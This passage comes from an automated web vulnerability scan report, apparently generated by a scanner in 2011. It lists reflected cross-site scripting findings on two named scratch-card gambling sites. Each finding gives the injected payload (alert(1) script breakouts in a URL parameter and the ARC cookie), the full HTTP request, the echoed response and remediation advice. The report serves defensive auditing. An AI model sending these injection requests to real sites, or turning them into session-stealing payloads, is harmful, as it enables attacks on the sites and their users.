The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70343'-alert(1)-'89d3bb43680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?70343'-alert(1)-'89d3bb43680=1 HTTP/1.1
Host: okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 11:40:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.okscratchcards.com/?70343'-alert(1)-'89d3bb43680=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e45f0"%3balert(1)//7fd470c036e was submitted in the ARC cookie. This input was echoed as e45f0";alert(1)//7fd470c036e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e45f0"%3balert(1)//7fd470c036e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e45f0%22%3Balert%281%29%2F%2F7fd470c036e; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137e45f0";alert(1)//7fd470c036e' border='0' width='1' height='1'>
...[SNIP]...

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload e4f61--><script>alert(1)</script>89a53cc69f9 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e4f61--><script>alert(1)</script>89a53cc69f9; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137e4f61%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E89a53cc69f9; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137e4f61--><script>alert(1)</script>89a53cc69f9">
...[SNIP]...

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d54'%3balert(1)//d85284f838d was submitted in the ARC cookie. This input was echoed as 48d54';alert(1)//d85284f838d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013748d54'%3balert(1)//d85284f838d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013748d54%27%3Balert%281%29%2F%2Fd85284f838d; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013748d54';alert(1)//d85284f838d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b048'%3balert(1)//c701db3fcc6 was submitted in the ARC cookie. This input was echoed as 7b048';alert(1)//c701db3fcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b048'%3balert(1)//c701db3fcc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301377b048%27%3Balert%281%29%2F%2Fc701db3fcc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301377b048';alert(1)//c701db3fcc6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload ad971--><script>alert(1)</script>f13763517ed was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ad971--><script>alert(1)</script>f13763517ed; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137ad971%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef13763517ed; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137ad971--><script>alert(1)</script>f13763517ed">
...[SNIP]...

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f1e"%3balert(1)//469e8a0b361 was submitted in the ARC cookie. This input was echoed as d5f1e";alert(1)//469e8a0b361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5f1e"%3balert(1)//469e8a0b361; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137d5f1e%22%3Balert%281%29%2F%2F469e8a0b361; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137d5f1e";alert(1)//469e8a0b361' border='0' width='1' height='1'>
...[SNIP]...

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b11"%3balert(1)//4b7eb4d38ea was submitted in the ARC cookie. This input was echoed as 38b11";alert(1)//4b7eb4d38ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013738b11"%3balert(1)//4b7eb4d38ea; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013738b11%22%3Balert%281%29%2F%2F4b7eb4d38ea; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013738b11";alert(1)//4b7eb4d38ea' border='0' width='1' height='1'>
...[SNIP]...

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload d5a37--><script>alert(1)</script>2daf1f805c5 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5a37--><script>alert(1)</script>2daf1f805c5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137d5a37%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2daf1f805c5; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137d5a37--><script>alert(1)</script>2daf1f805c5">
...[SNIP]...

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39fde'%3balert(1)//02965ba86d3 was submitted in the ARC cookie. This input was echoed as 39fde';alert(1)//02965ba86d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013739fde'%3balert(1)//02965ba86d3; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013739fde%27%3Balert%281%29%2F%2F02965ba86d3; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013739fde';alert(1)//02965ba86d3&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7b916--><script>alert(1)</script>15bbf18f026 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b916--><script>alert(1)</script>15bbf18f026; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377b916%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E15bbf18f026; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377b916--><script>alert(1)</script>15bbf18f026">
...[SNIP]...

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7a4'%3balert(1)//9a734a2209d was submitted in the ARC cookie. This input was echoed as 8c7a4';alert(1)//9a734a2209d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378c7a4'%3balert(1)//9a734a2209d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378c7a4%27%3Balert%281%29%2F%2F9a734a2209d; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378c7a4';alert(1)//9a734a2209d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ace"%3balert(1)//b357ff571da was submitted in the ARC cookie. This input was echoed as 59ace";alert(1)//b357ff571da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759ace"%3balert(1)//b357ff571da; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759ace%22%3Balert%281%29%2F%2Fb357ff571da; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759ace";alert(1)//b357ff571da' border='0' width='1' height='1'>
...[SNIP]...

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcc5b'%3balert(1)//703cebd666 was submitted in the ARC cookie. This input was echoed as dcc5b';alert(1)//703cebd666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137dcc5b'%3balert(1)//703cebd666; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
